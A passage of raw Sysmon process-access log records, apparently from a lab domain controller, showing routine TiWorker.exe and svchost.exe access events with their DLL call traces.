b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.102{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.102{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.086{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
